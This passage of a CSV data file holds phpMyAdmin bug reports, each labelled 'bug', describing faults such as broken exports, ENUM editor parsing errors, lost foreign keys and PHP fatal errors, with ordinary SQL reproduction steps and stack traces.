"24444","9799","PMA User Schema processUserChoice ) is broken.
PMA User Schema processUserChoice ) method uses an undefined variable delrow Original URL https sourceforge.net p phpmyadmin bugs 3405 Original author crackpl","bug"
"24444","9800","SQL query not shown when creating table.
When cfg[ AjaxEnable ] is set to true , the SQL query that was executed is not shown after creating a table.
Original URL https sourceforge.net p phpmyadmin bugs 3595 Original author roccivic Found in version 3.5.1","bug"
"24444","9801","Search fails with JS error when tooltips disabled.
Search in table page fails with JS error when tooltips disabled.
All browsers.
I see JS errors in browser console instead of search results when disabled tooltips in my current user preferences.
Original URL https sourceforge.net p phpmyadmin bugs 3596 Original author alsbz Found in version 3.5.1","bug"
"24444","9802","Warning open basedir restriction in effect.
In the file Theme.class.php the function setPath ) is called using folder from the load ) function.
The active theme is the default pmahomme).
Problem Warning in .
libraries Theme.class.php 83 file exists ) [function.file exists] open basedir restriction in effect.
File .
themes svg gradient.php info.inc.php) is not within the allowed path s) var www vhosts server httpdocs tmp) Backtrace .
libraries Theme.class.php 83 file exists string .
themes svg gradient.php info.inc.php) .
libraries Theme.class.php 130 PMA Theme gt;loadInfo ) .
libraries Theme Manager.class.php 239 PMA Theme load string .
themes svg gradient.php) .
libraries Theme Manager.class.php 139 PMA Theme Manager gt;loadThemes ) .
libraries common.inc.php 661 PMA Theme Manager gt;checkConfig ) .
main.php 11 require once .
libraries common.inc.php) Original URL https sourceforge.net p phpmyadmin bugs 3406 Original author pallieter Found in version 3.4.4","bug"
"24444","9803","MaxExactCountViews value causes server down.
Configuration value cfg[ MaxExactCountViews ] is set to 100000 by default from ID 3093145).
For big VIEWs it causes high server load during loading database database must build big query, use tmp etc.)
and probably server fall down if I don t kill queries).
Of course, I ve set it to zero but for new users or who is upgrading from 3.4 like us) it could be misleading.
I suggest to put the value to zero again and solve 3093145 differently.
It s this commit https github.com phpmyadmin phpmyadmin commit fc928ad7b6bf491b83713dfc8979cfeebf0dbd7f Original URL https sourceforge.net p phpmyadmin bugs 3599 Original author janpecek Found in version 3.5.1","bug"
"24444","9804","Data type is not correct in table Structure > Edit.
I found the following in the official master demo server in sakila.actor, open Structure tab click the Edit link for first name field in the AJAX edit page, the type of this field is INT , while it should be VARCHAR This also happen when AjaxEnable is set to false.
Original URL https sourceforge.net p phpmyadmin bugs 3407 Original author arisferyanto Found in version Latest Git","bug"
"24444","9805","BLOB emptied after editing another column.
The problem first reported in bug 3287596, that phpmyadmin produces invalid update queries when using the long edit mode in tables which contain blob columns, is not fixed yet in 3.4.3.2 which is the latest stable ).
Steps to reproduce create table test id int not null, data blob, primary key id)); insert into test values 1, aaa ); Use long edit to update the ID of the first column, which produces the update query UPDATE `xenconf`.`test` SET `id` = 3 , `data` = WHERE `test`.`id` =2; which clearly cleans out the data field, even though no edit took place, and no file was selected for upload in the column.
Inline editing of a row in this table works properly, in that the generated update query does not clean out the data field UPDATE `test` SET `id` = 4 WHERE `test`.`id` =3 LIMIT 1 Original URL https sourceforge.net p phpmyadmin bugs 3408 Original author hwundram Found in version 3.4.3","bug"
"24444","9806","Add user form prints JSON when user presses enter.
To reproduce go to the Users tab and click on add user , un the form, click inside an input field and press enter.
Original URL https sourceforge.net p phpmyadmin bugs 3603 Original author roccivic Found in version 3.5.1","bug"
"24444","9807","table with 700 columns causes crash.
i have a table with 700 fieds, and PMA just shows nothing, when trying to open structure or data.
Original URL https sourceforge.net p phpmyadmin bugs 3604 Original author rubo77 Found in version 3.4.5","bug"
"24444","9808","export fails when zip library is not installled.
When the zip binary is not installed on a server and the zip compression is selected when exporting to a file, export fails no error, it just crashes) It probably will fail when gzip bzip2 are missing as well Tested on Debian 6.0.2\Apache 2.2.16\PHP 5.3.3 Original URL https sourceforge.net p phpmyadmin bugs 3409 Original author ruleant Found in version 3.4.3","bug"
"24444","9809","Import not Working on IIS.
When I try to use the import file option it says it can t find the file or the maximum has been reached, when it s not the case, it might be a case of permissions with the user IIS uses, but it s worth to check if something can be done from your side.
Original URL https sourceforge.net p phpmyadmin bugs 3410 Original author jurgen73 Found in version 3.4.4","bug"
"24444","9810","Config for export compression not used.
I d like to reopen ticket 3305517 I take it from the subject of ticket 3305517 that it should be fixed with version 3.4.2.
I can still reproduce the error with version 3.4.4 Original URL https sourceforge.net p phpmyadmin bugs 3413 Original author minichip Found in version 3.4.4","bug"
"24444","9811","Strange behavior of Edit Privileges page.
After upgrading phpmyadmin to version 3.4.3.2 Edit privileges page does not totally replaces User overview page by itself.
It displays only in a little area in frame.
Scrolling with arrow keys becomes impossible because it scrolls the under page User overview istead of Edit privileges page.
Original URL https sourceforge.net p phpmyadmin bugs 3414 Original author tot to Found in version 2.11.9","bug"
"24444","9812","while saving inlineedit database is unknown.
I want to save some changes I made with inlineedit.
After pressing the save icon an message occours \ No database selected\ Udo Original URL https sourceforge.net p phpmyadmin bugs 3416 Original author besenreuther Found in version 3.4.4","bug"
"24444","9813","DbFilter, TableFilter clear button hidden on Chrome.
Some styling changes are needed because clear button is rendered behind the window probably position relative caused this).
Original URL https sourceforge.net p phpmyadmin bugs 3612 Original author mlewandow Found in version 3.5.0","bug"
"24444","9814","Constraints added even if I don t want them....
When copying a database via Operations gt; Copy Database to the constraints are created, even though the Add constraints checkbox is not checked.
This is with an innodb database.
Original URL https sourceforge.net p phpmyadmin bugs 3417 Original author mherbold Found in version 3.4.5","bug"
"24444","9815","PMA detectSize ).
when curr type == DECIMAL and last cumulative type==VARCHAR code bellow if size[M] gt;= last cumulative size) \{ return size[M]; \} else \{ return last cumulative size; \} shuld be changed to if size[M] 1 gt;= last cumulative size) \{ return size[M] 1; \} else \{ return last cumulative size; \} Is it true?
Original URL https sourceforge.net p phpmyadmin bugs 3418 Original author kunhualqk Found in version 3.4.1","bug"
"24444","9816","Browse table shows html source instead of browse result.
When I click to browse a table it always shows the html source of the browse result instead of the actual browse result.
I only recently installed this via WAMP on Windows 7 64 bit.
It was working initially, but since I killed a query via the show processlist and kill lt;process id gt; I get this problem.
I have installed newer phpmyadmin and development version, but I get the same problem.
WampServer2.1d x64 phpmyadmin3.4.4 Apache2.2.17 mysql5.1.53 php5.3.4 google chrome 13.0.782.215 m Ie 9.0.8112 32 bit shows html source and partial proper view Copy of first part of html source class= where clause value = 60ratings 60.
60user id 60 3D 0 AND 60ratings 60.
60movie id 60 3D 386 gt; lt; span gt; lt; td gt; lt;td align= center gt; lt;span class= nowrap gt; lt;a href= tbl change.php?db=rateit amp;amp;table=ratings amp;amp;where clause= 60ratings 60.
60user id 60 3D 0 AND 60ratings 60.
60movie id 60 3D 386 amp;amp;clause is unique=1 amp;amp;sql query=SELECT 2A FROM 60ratings 60 amp;amp;goto=sql.php amp;amp;default action=insert amp;amp;token=20e06d2d33d314248daa353df59d3b4c gt; lt;span class= nowrap gt; lt;img src= themes dot.gif title= Copy alt= Copy class= icon ic b insrow gt; Copy lt; span gt; lt; a gt; lt;input type= hidden class= where clause value = 60ratings 60.
60user id 60 3D 0 AND 60ratings 60.
60movie id 60 3D 386 gt; lt; span gt; lt; td gt; lt;td align= center gt; lt;a href= sql.php?db=rateit amp;amp;table=ratings amp;amp;sql query=DELETE FROM 60rateit 60.
60ratings 60 WHERE 60ratings 60.
60user id 60 3D 0 AND 60ratings 60.
60movie id 60 3D 386 amp;amp;message to show=The row has been deleted amp;amp;goto=sql.php 3Fdb 3Drateit 26table 3Dratings 26sql query 3DSELECT 2B 252A 2BFROM 2B 2560ratings 2560 26message to show 3DThe 2Brow 2Bhas 2Bbeen 2Bdeleted 26goto 3Dtbl structure.php 26token 3D20e06d2d33d314248daa353df59d3b4c amp;amp;token=20e06d2d33d314248daa353df59d3b4c onclick= return confirmLink this, DELETE FROM `rateit`.`ratings` WHERE `ratings`.`user id` = 0 AND `ratings`.`movie id` = 386 ) gt; lt;span class= nowrap gt; lt;img src= themes dot.gif title= Delete alt= Delete class= icon ic b drop gt; Delete lt; span gt; lt; a gt; lt; td gt; lt;td align= right class= data grid edit not null nowrap gt;0 lt; td gt; lt;td align= right class= data grid edit not null nowrap gt;386 lt; td gt; lt;td align= right class= data grid edit not null nowrap gt;8 lt; td gt; lt; tr gt; Original URL https sourceforge.net p phpmyadmin bugs 3419 Original author fdloubser Found in version 3.4.4","bug"
"24444","9817","Collation not displayed for long enum fileds.
The collation for long enum fields is not displayed see the read area in the picture).
Schema.sql https github.com paullik dotophp blob master docs schema.sql Versions MySQL Server version 5.5.15 log Source distribution PMA 3.4.4 PHP 5.3.8 with Suhosin Patch cli) built Aug 29 2011 12 14 45) Copyright c) 1997 2011 The PHP Group Zend Engine v2.3.0, Copyright c) 1998 2011 Zend Technologies Original URL https sourceforge.net p phpmyadmin bugs 3420 Original author paullik Found in version 3.4.4","bug"
"24444","9818","grid editor does not work for ENUM fields.
When clicking a ENUM type field, it is not possible to edit this cell.
Expected behaviour would be a drop down box showing the possible ENUM options.
Original URL https sourceforge.net p phpmyadmin bugs 3421 Original author ruleant Found in version Latest Git","bug"
"24444","9819","Table structure display issues.
Hi, When initially creating a table and creating only one field, the column editor AJAX popup) is too large and is scrolled mostly off of the screen.
See the screenshot for details.
I think it should only be as wide as needed in the first place, it should definitely not need two sets of scrollbars, and should be properly centered so I don t need to grab and drag it over just to read the labels.
My resolution in this case is 1024x768, FireFox 3.6.something and Internet Explorer 8 Original URL https sourceforge.net p phpmyadmin bugs 3422 Original author ibennetch Found in version 3.4.0","bug"
"24444","9820","Edit SQL statement after error.
If a error occurs during executing sql query phpmyadmin allows to edit the sql statement using the link at the top of the error page, which is linked to tbl sql.php file, but there is an extra question mark in the url and this prevents the actual statement to appear in texteare to edit.
Only the standard select statement is displayed instead.
Original URL https sourceforge.net p phpmyadmin bugs 3423 Original author anonymous Found in version 3.4.4","bug"
"24444","9821","Joomla db export in ods format produces error.
Mysql 5.1.58 community log PHP 5.2.17 phpmyadmin 3.4.4 If I try to export a basic joomla database in ODS open office spreadsheet) format, the file cannot be imported or opened in Open Office.
The error I see in OpenOffice when trying to open it Format error discovered in the file in sub document content.xml at 166,61346 row,col).
however the ODS format works for Wordpress for both import and opening in OO 3.2, and it works for a joomla table Original URL https sourceforge.net p phpmyadmin bugs 3424 Original author jpratt1 Found in version 2.11.9","bug"
"24444","9822","Compression compresses exported .sql twice.
I am using phpmyadmin 3.4.4, php 5.3.8, mysql 5.1.58, apache 2.2.20 on CentOS 5.6 64bit I am running phpMyAdmin over https When exporting a database choosing gzipped the .gz file is compressed twice.
just like the user is reporting here see comment number 4 from dennis87 http sourceforge.net projects phpmyadmin forums forum 72909 topic 4428609 Can somone else confirm this bug is still present in phpyadmin 3.4.4?
Original URL https sourceforge.net p phpmyadmin bugs 3425 Original author aommundsen Found in version 3.5.5","bug"
"24444","9823","Entering foreign keys does not reset NULL.
1) Create the test data using the supplied SQL script 2) In phpmyadmin, open database `test` and use Designer to make a relationship between `t2`.`c2` being the foreign key and `t1`.`c1` being the referenced key.
3) open t2 and click Insert in the tabbar to start insertion of the new row 4) As a result of setting the relationship on step 2, there will be a Browse Foreign Values icon next to the entry field on the insertion page.
Click the icon so the browse foreign values window pops up.
5) Click on any value in the window that popped up.
That will cause that value to be populated into the `t2`.`c2` entry field, BUT the NULL checkbox next to it will not be automatically cleared as it should!)
5.1) I am not sure what I was doing next, but in some cases clicking Save with this contradictory data `t2`.`c2` having value in it AND `t2`.`c2` having NULL checkbox checked) caused the record to be inserted with NULL value rather than value I entered into the field).
Original URL https sourceforge.net p phpmyadmin bugs 3426 Original author wesha Found in version 3.4.4","bug"
"24444","9824","Error messages are displayed using wrong codetable.. 1\.
Create test database CREATE TABLE `test` `data` varchar 64) CHARACTER SET utf8 NOT NULL, UNIQUE KEY `data` `data`) ) 2\.
Add test data.
INSERT INTO `test`.`test` `data`) VALUES xd0xb0xd0xb1xd0xb2 ); 3\.
Issue the same statement again INSERT INTO `test`.`test` `data`) VALUES xd0xb0xd0xb1xd0xb2 ); 4\.
Receive error 1062 Duplicate entry xc3x90xc2xb0xc3x90xc2xb1xc3x90xc2xb2 for key data Ecxpected 1062 Duplicate entry xd0xb0xd0xb1xd0xb2 for key data Original URL https sourceforge.net p phpmyadmin bugs 3427 Original author wesha Found in version 3.4.7","bug"
"24444","9825","Deleting a table doesn t change the table counter.
1) create a DB `test` with table `test` 2) Brouse the database `test`.
See the list of tables containing table `test`.
and in the bottom line of that list, counter that says 1 table 3) Click on the drop table button and confirm table drop.
4) The table is dropped and disappears from the list, but the counter still says 1 table Expected the counter will decrease and say 0 tables .
Original URL https sourceforge.net p phpmyadmin bugs 3428 Original author wesha Found in version 3.4.4","bug"
"24444","9826","Portrait vs Landscape is ignored.
Which ever I select, Portrait vs Landscape is ignored.
result PDF is always Portrait.
freshly installed 3.5.1 on OSX.
Original URL https sourceforge.net p phpmyadmin bugs 3628 Original author somekool Found in version 3.5.1","bug"
"24444","9827","suggests pma config instead of pma userconfig.
User preferences storage table Leave blank for no user preferences storage in database, suggested pma config phpmyadmin setup index.php | edit server | configuration storage | user preferences storage table suggested pma config instead of suggested pma userconfig Original URL https sourceforge.net p phpmyadmin bugs 3429 Original author osde8info","bug"
"24444","9828","User overview erroneously loaded into Ajax dialog.
Go to Privileges tab.
Try to edit privileges for any user.
User overview page itself is loaded into the Ajax dialog rather than the page to edit the privileges for the user.
Original URL https sourceforge.net p phpmyadmin bugs 3430 Original author madhuracj Found in version Latest Git","bug"
"24444","9829","Zoom search, checkboxes and fields not being reset.
In zoom search, click a particular data point to take the data to the edit mode.
If the retrieved data has a null checkbox checked, subsequent edit dialogs will have the same checkbox checked irrespective of latter being really null.
Similar behavior can be observed for values.
Even if the value for a particular column of latter is empty or null, the editor would still display the value from the previous data point.
Original URL https sourceforge.net p phpmyadmin bugs 3432 Original author madhuracj Found in version Latest Git","bug"
"24444","9830","Zoom search, problems with data editor.
Following problems are there with the data point editor of zoom search feature.
1\.
Null checkboxes are there for each and every column irrespective of whether the column can contain null 2\.
Multi select is used for enum columns dropdown expected) 3\.
Input field is used for set columns multi select is expected) Original URL https sourceforge.net p phpmyadmin bugs 3433 Original author madhuracj Found in version Latest Git","bug"
"24444","9831","Zoom search and inserting foreign values.
Steps to reproduce Do a zoom search on sakila.payment table Click on a data point to edit data Try to edit customer id or rental id using foreign key browser An error occurs while it tries to enter the value chosen in to the main browser window.
Original URL https sourceforge.net p phpmyadmin bugs 3434 Original author madhuracj Found in version Latest Git","bug"
"24444","9832","Broken binary column when Show binary.. not set.
Broken utf8 bin display data columnt on Full text option with all templates... Just watch youtube video to see a bug http www.youtube.com watch?v=OA x F t6 A .
This bug exists very long time.
Original URL https sourceforge.net p phpmyadmin bugs 3435 Original author sandel Found in version 3.4.5","bug"
"24444","9833","SQL query tab broken.
From the main page click SQL and enter select true; then press Go.
A javascript error popup appears with the message Missing value in the form The popup query window from the navigation frame does not appear to be affected.
Git bisect says 5e83631469f286abb77c95adf5284923a3a0873a is the first bad commit Original URL https sourceforge.net p phpmyadmin bugs 3436 Original author ibennetch Found in version Latest Git","bug"
"24444","9834","select in stored procedure returns error 1312.
I create a very simple procedure whit only one SELECT CREATE PROCEDURE `seleziona` ) SELECT Nome FROM utenti; And then I call it CALL seleziona; in local machine no problem phpMyAdmin 3.4.9 server Apache 2.2.21 Win32) PHP 5.3.9 MySQL 5.5.20 log But in production online server phpMyAdmin 3.4.10.1 server Apache 2.2.22 PHP 5.3.10 MySQL 5.1.56 log when from SQL window I call this procedure or every other with a select statement ) phpMyAdmin returns the error 1312 PROCEDURE my database.seleziona can t return a result set in the given context Original URL https sourceforge.net p phpmyadmin bugs 3634 Original author michelesalvador Found in version 3.4.10","bug"
"24444","9835","Error searching table with many fields.
If table have more than 100 not sure about exact number) fields, trying to search in it shows SQL error saying 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near LIMIT 0, 30 And PHP errors like this Notice in .
tbl select.php 259 Undefined variable max number of fields Notice in .
tbl select.php 273 Undefined variable where ...etc.
On the test server there is a database named jf and table players with 179 fields in it error displays).
The same table is in attachment.
You can try to reproduce the error with it.
I have to say that not every server displays the error, it is possible that some PHP settings could be the reason of this behavior.
Original URL https sourceforge.net p phpmyadmin bugs 3635 Original author hanut Found in version 3.5.2","bug"
"24444","9836","Full text button unchecks results display options.
Clicking on the full partial text button unchecks Show binary contents and Show binary contents as HEX checkboxes in the options slider Original URL https sourceforge.net p phpmyadmin bugs 3437 Original author madhuracj Found in version 3.4.4","bug"
"24444","9837","Call to undefined function pma issuperuser ).
Fatal error Call to undefined function pma issuperuser ) in var www phpMyAdmin 3.4.5 all languages libraries server common.inc.php on line 49 I am using a mutli server setup.
When opening phpMyAdmin, the frameset is shown with the General Settings at the right frame.
There, the server selection is possible.
Below that, in Appearance Settings , the link More settings leads to the error message above.
Without looking at the code the problem might be related to the fact that no server is selected yet.
I have noticed the error in 3.4.4 as well already.
Original URL https sourceforge.net p phpmyadmin bugs 3438 Original author ci dev Found in version 3.4.5","bug"
"24444","9838","Relations are dropped created on every change.
I ve just upgraded to 3.4.5 was on 3.2.3 before), and I m facing the same bug as 1982489 which was fixed in 2.11, so it may be the same fix).
PHP 5.3.3 MySQL 5.1.49 InnoDB Linux Debian stable squeeze) PMA 3.4.5 When updating a contraint on a table, all constraints innodb) are removed then added back.
For me there s one issue to fix and one improvement to make issue don t remove a constraint already up to date may be the introduction of xc2xabRESTRICTxc2xbb that s not working) improvement instead of running multiple queries, only one should be sent, so that the table isn t created for every deletion adding.
This can also fix the issue reported here replace ALTER TABLE XX DROP CONSTRAINT1; ALTER TABLE XX ADD FOREIGN KEY YY; with ALTER TABLE XX DROP CONSTRAINT1, ADD FOREIGN KEY YY; This way the table is only created once, and I don t care if all constraints are dropped then added back ) Thanks!
Yvan.
Original URL https sourceforge.net p phpmyadmin bugs 3439 Original author blade1o6 Found in version 3.4.5","bug"
"24444","9839","Display options link missing after search.
To reproduce open a table click Search click Go the display Options link is missing Original URL https sourceforge.net p phpmyadmin bugs 3440 Original author lem9 Found in version 3.4.5","bug"
"24444","9840","Search shows results, browse none.
When using the search box it correctly shows x matches inside table y. Clicking browse often doesn t show the results.
I have added a sample database which shows this problem, steps to reproduce click search gt; search for user1 or User1 in the example database gt; click browse.
result MySQL returned an empty result set i.e.
zero rows).
Query took 0.0003 sec )).
phpmyadmin 3.4.5 MySQL client version 5.1.56 MySQL Server version 5.1.56 1 PHP extension mysqli PHP Version 5.3.3 7 squeeze3 Browser Firefox 6.0.1 Original URL https sourceforge.net p phpmyadmin bugs 3442 Original author gieltje Found in version 3.4.5","bug"
"24444","9841","SQL export bug.
FastCGI stderr PHP Fatal error Call to undefined function getTableDefStandIn ) in libraries plugins export ExportSql.class.php on line 1478 Original URL https sourceforge.net p phpmyadmin bugs 3644 Original author nijel Found in version Latest Git","bug"
"24444","9842","login screen appear under the page.
i have opened a new SQL window without the left side bar) and then when i have tried to execute my select, i ve got an error... the session was timed out and I should login again as normally we do, when the session is gone... but this time i have see a new behavior, the login screen under the SQL form...the page don t redirect me on the login screen, it s simply appears... ;) look at the picture!
i don t know if it s the same if the page is not opened in a new tab...
Original URL https sourceforge.net p phpmyadmin bugs 3443 Original author diopralinato Found in version 3.4.5","bug"
"24444","9843","Extraneous db choices.
The logic to exclude information schema and mysql from the db list fails.
Original URL https sourceforge.net p phpmyadmin bugs 3444 Original author lem9 Found in version 3.4.5","bug"
"24444","9844","Tables not found in DB with 123 tables.
I have DB with 123 tables, but phpmyadmin shows me No tables found in database.
when i try to enter in it.
All other databases works correctly.
When i try to connect to DB using ssh it works fine, and site that uses this DB works fine too Original URL https sourceforge.net p phpmyadmin bugs 3445 Original author rednaxi Found in version 3.4.7","bug"
"24444","9845","Synchronizing indexes of more than 1 columns.
Synchonizing does not know how to handle table indexes that have more than 1 columns.
As an example, see index contestant email in the attached image.
1) I have identical databases in two servers.
Table contest has similar indexes on both servers, 2 columns.
In each attempt to synchronize them, PhpMyAdmin states that there is a structural difference S) between source and target despite the fact that there is no difference 2) I have databases with difference in one table index.
On source table contest has index with 2 columns.
On target table contest has index with 1 column.
In attempt to synchronize them, PhpMyAdmin states that there is a structural difference S) between source and target.
After sync operation, result says that synchronizing was succesful.
If I synchronize databases again, same difference is still existing.
Original URL https sourceforge.net p phpmyadmin bugs 3647 Original author timomoisio","bug"
"24444","9846","Relation is lost after copying a table.
When performing a copy of the table from one DB to another, the structure and data is transferred without any problems, nevertheless foreign keys are lost.
This is understandable behaviour, since the table might not exist in the new DB, so it might worth it to check if related table exists first, and warn if keys can not be recreated.
Also, there is no option to copy selected tables from one DB to another either all, or one by one.
Pretty annoying if you want to duplicate just 10 tables out of 100.
Original URL https sourceforge.net p phpmyadmin bugs 3446 Original author anonymous Found in version 3.4.5","bug"
"24444","9847","Relations foreign key) lost on export.
See bug 3418311, I have the same problem, but in the Git 20111004 022002), not in 3.4.5 On older versions of phpMyAdmin including 3.4.5), at the end of the SQL dump, it adds the alter table to add the foreign keys, like so ALTER TABLE `usersPermissions` ADD CONSTRAINT `usersPermissions ibfk 2` FOREIGN KEY `user`) REFERENCES `users` `identifier`) ON DELETE CASCADE, ADD CONSTRAINT `usersPermissions ibfk 3` FOREIGN KEY `permission`) REFERENCES `permissions` `identifier`) ON DELETE CASCADE; I have found that in the few latest Git snapshot, the export doesn t export the foreign keys anymore.
I have tested with different tables schemas.
Original URL https sourceforge.net p phpmyadmin bugs 3447 Original author jvaldron Found in version Latest Git snapshot","bug"
"24444","9848","Links in navigation and cfg[MainPageIconic]=false.
Please see the attached screenshot Original URL https sourceforge.net p phpmyadmin bugs 3448 Original author madhuracj Found in version 3.4.5","bug"
"24444","9849","Inline edit shows dropdowns even after closing.
Steps to reproduce Go to sakila.film table.
Activate inline edit on a column Close the inline mode immediately Asynchronously fetched dropdowns that returns afterwards are still displayed Original URL https sourceforge.net p phpmyadmin bugs 3449 Original author madhuracj Found in version 3.4.5","bug"
"24444","9850","select string as col name, export.
When you execute the query SELECT id, asdf as firstname, lastname, email FROM testable on the table created by database1.sql attached), it shows the data as it should be in the web interface.
If you then click the export button below the data to export the queried data), the column firstname gets renamed to asdf .
The firstname in each row should be asdf per the query, but the field name should export as firstname.
Instead, it exports as asdf.
This occurs on 3.4.4 as well as 3.3.9.
3.4.4 is running on OSX apache 2.2.17, php 5.3.4, MySQL 5.5.15, firefox 7.0.1.
Original URL https sourceforge.net p phpmyadmin bugs 3450 Original author anonymous Found in version 3.4.4","bug"
"24444","9851","dropdown issue.
The database select object dropdown) is not working.
First I click a database name, it is ok, then it won\ t change if i change the dropdown to another db.
chromium browser) got the same result on stable.demo site.
Original URL https sourceforge.net p phpmyadmin bugs 3452 Original author spuri hu Found in version 3.4.5","bug"
"24444","9852","Missing documentation section.
Set cfg[ UserprefsDeveloperTab ] to true Go to home gt; more settings gt; features gt; developer Links next to Debug SQL just point to the top of the page in the documentation and the wiki, since that section seems to be missing.
Original URL https sourceforge.net p phpmyadmin bugs 3453 Original author roccivic Found in version 3.4.6","bug"
"24444","9853","isHttps function does not detect Front End Https.
Some ISPs and Microsoft using the Front End Https environment variable if a load balancer is handling the ssl encryption.
Original URL https sourceforge.net p phpmyadmin bugs 3454 Original author lord rod Found in version 3.4.6","bug"
"24444","9854","Import the database, missing parameter format.
Import the database produce the error import.php Missing parameter format lt;a href= Documentation.html faqmissingparameters target= documentation gt; lt;img src= themes dot.gif title= Documentation alt= Documentation class= icon ic b help gt; lt; a gt; This error produces when pushing enter button on any form input, There is no Go button.
Import server works good.
Original URL https sourceforge.net p phpmyadmin bugs 3657 Original author uniond Found in version Latest Git","bug"
"24444","9855","Broken PDF file when exporting database to PDF.
When exporting a database to PDF form, the resultant PDF is broken.
Original URL https sourceforge.net p phpmyadmin bugs 3455 Original author madhuracj Found in version 3.4.6","bug"
"24444","9856","Relations links disappear from Designer view.
I created a database, all MyISAM tables Went to design it by clicking on the Designer tab Added lots of relations links Changed a table Clicked the reload button in designer Now the links only appear when changed table is displayed small, they all disappear when that table is big.
This is caused by there being relations for a key that no longer exists.
Workaround Keep the changed table displayed small in the designer.
P.S.
There needs to be a Designer category in the bug tracker category list.
Original URL https sourceforge.net p phpmyadmin bugs 3457 Original author random source Found in version 3.3.9","bug"
"24444","9857","Cannot copy a DB with table views.
There is an issue with copying a DB that has a table named the same as the database and has a view with a similar name.
This can be recreated with the following steps with PHPMyAdmin, is there any other way? )
) 1 create a database t 2 create a table t.t 3 create a view t.t v 4 With PHPMyAdmin, select the db t Use Operations Copy database to t 1 select Structure and data CREATE DATABASE before copying and Add AUTO INCREMENT value ) The table will be copied, but not the view, and an error will be generated.
Original URL https sourceforge.net p phpmyadmin bugs 3660 Original author anonymous Found in version 3.5.2","bug"
"24444","9858","add column after drop.
if you try to drop a column in structure tab and then you want to add a new column, in after select there is still the dropped column option Original URL https sourceforge.net p phpmyadmin bugs 3458 Original author tizianozonta Found in version 2.4.0","bug"
"24444","9859","Links to PHP manual are broken.
in file .
libraries core.lib.php on line 266 if you use the function PMA linkURL ) instead the direct URL the link is not valid...see the screenshot Original URL https sourceforge.net p phpmyadmin bugs 3459 Original author diopralinato Found in version 3.4.6","bug"
"24444","9860","enum data split at space char.
In Version 3.4.5 if you have an enum field with values abc cd , def gh and hit the button more space to edit it will produce a list with abc, def I think the used RegEx is not aware of spaces.
Original URL https sourceforge.net p phpmyadmin bugs 3460 Original author mokraemer Found in version 3.4.5","bug"
"24444","9861","Large amounts of data cause dropdown to refuse NULL.
I ve used the latest development version and it works well, mainly with foreign keys however, there s one issue with them, if you have a database with over 10 20 records, and you set NULL in the database table, it will not work if you want to make a certain row NULL it s fine with selecting a record from the other table as in my attached table but setting it to NULL doesn t always work for large databases where you want certain records nullified.
Anyone else tried this and had this problem?
[note that for the attachment you will need to add more data, it s only got 2 records].
Original URL https sourceforge.net p phpmyadmin bugs 3461 Original author chalze6 Found in version 2.11.9","bug"
"24444","9862","Export to bzip2 is not working.
Tested with phpMyAdmin 3.4.6 and 3.4.7.
Trying to export with bzip compression we get not compressed .sql file.
Mistake is in the file libraries display export.lib.php on line 312.
Problem solved with changing value= bzip2 to value= bzip .
Original URL https sourceforge.net p phpmyadmin bugs 3462 Original author hanut Found in version 3.4.6","bug"
"24444","9863","Version check not working https).
The Version check functionality Settings gt;Features) which enables check for latest version on main phpMyAdmin page hasn t been working since the early release of 3.4.
My current version of phpMyAdmin 3.4.3.2.
I checked and searched the bug list as well as the release notes for 3.4.6 but saw nothing related to this issue.
However, installing 3.4.6 would be meaningless as it s the latest version.
I think because it only worked on the first release of 3.4, no one possibly new it existed.
Original URL https sourceforge.net p phpmyadmin bugs 3463 Original author edgirard Found in version 3.4.3","bug"
"24444","9864","Visual column separation.
From the forum russdirks) My ISP just upgraded to PMA 3.4.5, and I notice that the program has been given a visual makeover, much of which I like.
The only thing I don t like is that when browsing data in a table, there is nothing to visually separate one column of data from the next.
Older versions uses alternate shading, or vertical lines, both of which I liked.
Is there any way to configure PMA to use some sort of visual column separators?
Original URL https sourceforge.net p phpmyadmin bugs 3464 Original author lem9 Found in version 3.4.7","bug"
"24444","9865","ENUM SET editor can t handle commas in values.
Steps to reproduce Click create table Set column type to ENUM Type in foo,bar , baz,goo Click Get more editing space Expected result The form loads 2 values foo,bar and baz,goo Actual result The form loads 4 values foo, bar, baz and goo The editor needs a stack parser for splitting the input values instead of the naive .split ) function Original URL https sourceforge.net p phpmyadmin bugs 3465 Original author roccivic Found in version 3.4.6","bug"
"24444","9866","sometimes PMA show me double error.
I don t know why or when, but sometimes PMA show me double error div...see my screenshot.
Original URL https sourceforge.net p phpmyadmin bugs 3466 Original author diopralinato Found in version 3.4.7","bug"
"24444","9867","No links to browse empty views and tables).
The database summary screen lists all tables and views.
Each table view has a number of buttons, including browse and empty .
The browse and empty buttons are both disabled and greyed out when the table view is empty.
However, the views are always shown as having zero rows because the actual number cannot be known without querying the view).
Hence the browse and empty icons are always disabled for views even when the view contains data, and is updatable.
Note that this also applies to system generated views e.g.
in the information schema).
It is also possible that other processes have inserted rows after the page was generated.
For example, I have two PMA windows open, one is running scripts and the other is viewing the data).
Hence it would be convenient also to be able to click browse on a supposedly empty table.
Browsing an empty table is no problem you just get no rows found .
The current visual feedback greyed out icon) is still useful.
Therefore I would suggest keeping the existing logic that greys out the icons, but keep the links enabled at all times.
Original URL https sourceforge.net p phpmyadmin bugs 3467 Original author fisharebest Found in version 3.4.3","bug"
"24444","9868","PHP Fatal Error on Status Advisor page.
When on the Status page gt; Advisor tab in PMA, the analyzer runs forever on my system, with the following is received as the response from server status.php when checking in firebug chrome developer tools lt;b gt;Fatal error lt; b gt; Call to a member function memory ) on a non object in lt;b gt; path to PMA libraries Advisor.class.php lt; b gt; on line lt;b gt;37 lt; b gt; lt;br gt; This is due to `getSysInfo returning an empty array since PHP OS is SunOS for me, which is not listed in the array in `getSysInfo as a supported OS.
This should probably cause a more graceful failure from Advisor.class.php , maybe with the help of an `if !empty sysinfo)) check before the `memory ) method is called or something.
SunOs 5.10 PHP 5.2.6 PMA 3.5.2.2 Original URL https sourceforge.net p phpmyadmin bugs 3671 Original author bananastalktome Found in version 3.5.2","bug"
"24444","9869","TRUE not recognized by parser.
When I create a table that has a BOOLEAN field in it, and the default is set to 1 via the create table form without ajax)) the SQL that is output above the newly created table has the following line `active` BOOLEAN NOT NULL DEFAULTTRUE, DEFAULTTRUE no space between words) is not recognized, and should probably be DEFAULT TRUE with a space).
Original URL https sourceforge.net p phpmyadmin bugs 3468 Original author benjamwelker Found in version 3.4.7","bug"
"24444","9870","ODS Import ignores memory limits.
Importing ODS files always limits to 120 seconds and 128M The memory limit setting in php.ini and MemoryLimit setting in config are completely ignored.
